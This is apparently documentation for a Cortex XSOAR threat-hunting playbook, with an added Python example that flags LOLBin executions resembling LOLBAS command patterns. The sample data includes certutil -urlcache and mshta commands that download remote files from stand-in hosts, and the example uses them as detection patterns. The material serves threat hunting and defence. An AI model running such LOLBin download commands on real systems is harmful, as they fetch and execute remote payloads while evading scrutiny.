Proactive Threat Hunting - SDO Threat Hunting
This playbook is part of the Proactive Threat Hunting Pack.
Supported versions
Available on Cortex XSOAR (versions 6.9.0 and later).
This playbook will be executed when the analyst chooses to perform SDO hunting. The playbook receives an SDO type indicator and executes the following steps:
- Searches IOCs related to the SDO indicator - IPs, Hashes, Domains, URLs.
- Hunts for the found IOCs using the "Threat Hunting - Generic" sub-playbook.
- Searches attack patterns that are related to the SDO indicator.
- Searches LOLBAS tools that are related to the found attack patterns.
- Hunts for LOLBin executions whose command-line arguments are similar to the malicious command patterns documented by LOLBAS.
Dependencies
This playbook uses the following sub-playbooks, integrations, and scripts.
Sub-playbooks
- Threat Hunting - Generic
- Search LOLBAS Tools By Name
- TIM - Indicator Relationships Analysis
- Search and Compare Process Executions - Generic
Integrations
This playbook does not use any integrations.
Scripts
- SearchIndicatorRelationships
- Set
- SearchIndicator
- JsonToTable
Commands
- setIncident
- appendIndicatorField
- associateIndicatorsToIncident
Playbook Inputs
| Name | Description | Default Value | Required |
|---|---|---|---|
| SDOName | The SDO name. | | Optional |
| SDOType | The SDO type. | Campaign | Optional |
| HuntingTimeFrame | Time in relative date or range format (for example: "1 day", "3 weeks ago", "between 2021-01-01 12:34:56 +02:00 and 2021-02-01 12:34:56 +02:00"). The default is the last 24 hours. | 30 days | Optional |
| StringSimilarityThreshold | Threshold for the StringSimilarity automation. This playbook uses StringSimilarity to compare a tool's documented malicious usage patterns with command-line arguments found in the environment. Provide a number between 0 and 1, where 1 represents the most similar string comparison results. The automation outputs only results with a similarity score equal to or greater than the specified threshold. | | Optional |
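The last hunting step above (comparing LOLBin command lines against LOLBAS command patterns) and the StringSimilarityThreshold input both come down to the same operation: score each observed command line against the patterns for that tool and keep only the matches at or above the threshold. The following is an added example, not code from this playbook or from the XSOAR StringSimilarity automation. It assumes `difflib.SequenceMatcher` as the similarity measure (the page does not say which algorithm the automation uses), and the LOLBAS-style patterns and the process executions are constructed sample data in the shape an EDR search might return.

```python
"""Added example: filter observed LOLBin executions by similarity to
LOLBAS-style command patterns, the way the playbook's threshold is described.

Assumptions (not stated on the page):
  - similarity is measured with difflib.SequenceMatcher ratio (0..1)
  - patterns are keyed by the tool's process name, mirroring the
    "Search LOLBAS Tools By Name" lookup
"""
import re
from difflib import SequenceMatcher

# Constructed sample patterns in the style of LOLBAS "malicious command" entries
# (hypothetical values, keyed by tool name).
LOLBAS_PATTERNS = {
    "certutil.exe": [
        "certutil.exe -urlcache -split -f http://example.invalid/file.txt file.txt",
    ],
    "mshta.exe": [
        "mshta.exe http://example.invalid/page.hta",
    ],
}

# Constructed sample process executions as a "Search and Compare Process
# Executions" style query might return them (hostnames and paths are made up).
OBSERVED_EXECUTIONS = [
    {"host": "ws-01", "name": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.txt"},
    {"host": "ws-02", "name": "certutil.exe",
     "cmdline": "certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256"},
    {"host": "ws-03", "name": "mshta.exe",
     "cmdline": "mshta.exe C:\\Users\\alice\\AppData\\Local\\Temp\\update.hta"},
    {"host": "ws-04", "name": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
]


def normalize(cmdline):
    """Lowercase and collapse whitespace so case and spacing differences
    between a documented pattern and a real command line do not dominate."""
    return re.sub(r"\s+", " ", cmdline.strip().lower())


def similarity(a, b):
    """Similarity score in [0, 1]; 1.0 means the normalized strings are identical."""
    return SequenceMatcher(None, normalize(a), normalize(b)).ratio()


def hunt_lolbin_executions(executions, patterns, threshold):
    """Return executions whose command line scores >= threshold against any
    pattern documented for the same tool, best matches first."""
    if not 0 <= threshold <= 1:
        raise ValueError("threshold must be between 0 and 1")
    hits = []
    for ex in executions:
        # Only compare against patterns documented for this tool name;
        # tools with no LOLBAS entry are never reported.
        for pattern in patterns.get(ex["name"].lower(), []):
            score = similarity(ex["cmdline"], pattern)
            if score >= threshold:
                hits.append({"host": ex["host"], "name": ex["name"],
                             "cmdline": ex["cmdline"], "pattern": pattern,
                             "score": round(score, 3)})
    return sorted(hits, key=lambda h: h["score"], reverse=True)


if __name__ == "__main__":
    for hit in hunt_lolbin_executions(OBSERVED_EXECUTIONS, LOLBAS_PATTERNS, 0.6):
        print(f"{hit['host']}: {hit['cmdline']}  (score {hit['score']} vs {hit['pattern']})")
```

With a threshold of 0.6 only the certutil download on ws-01 is reported: the benign `-hashfile` invocation on ws-02 shares only the tool name with the pattern, and the mshta run on ws-03 loads a local file rather than a URL, so its score falls below the cut-off. Lowering the threshold toward 0 returns every execution of a tool that has a pattern, raising it to 1 requires an exact match; the threshold therefore trades missed variants against analyst noise, which is why the playbook leaves it as an input.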
Playbook Outputs
There are no outputs for this playbook.
Playbook Image
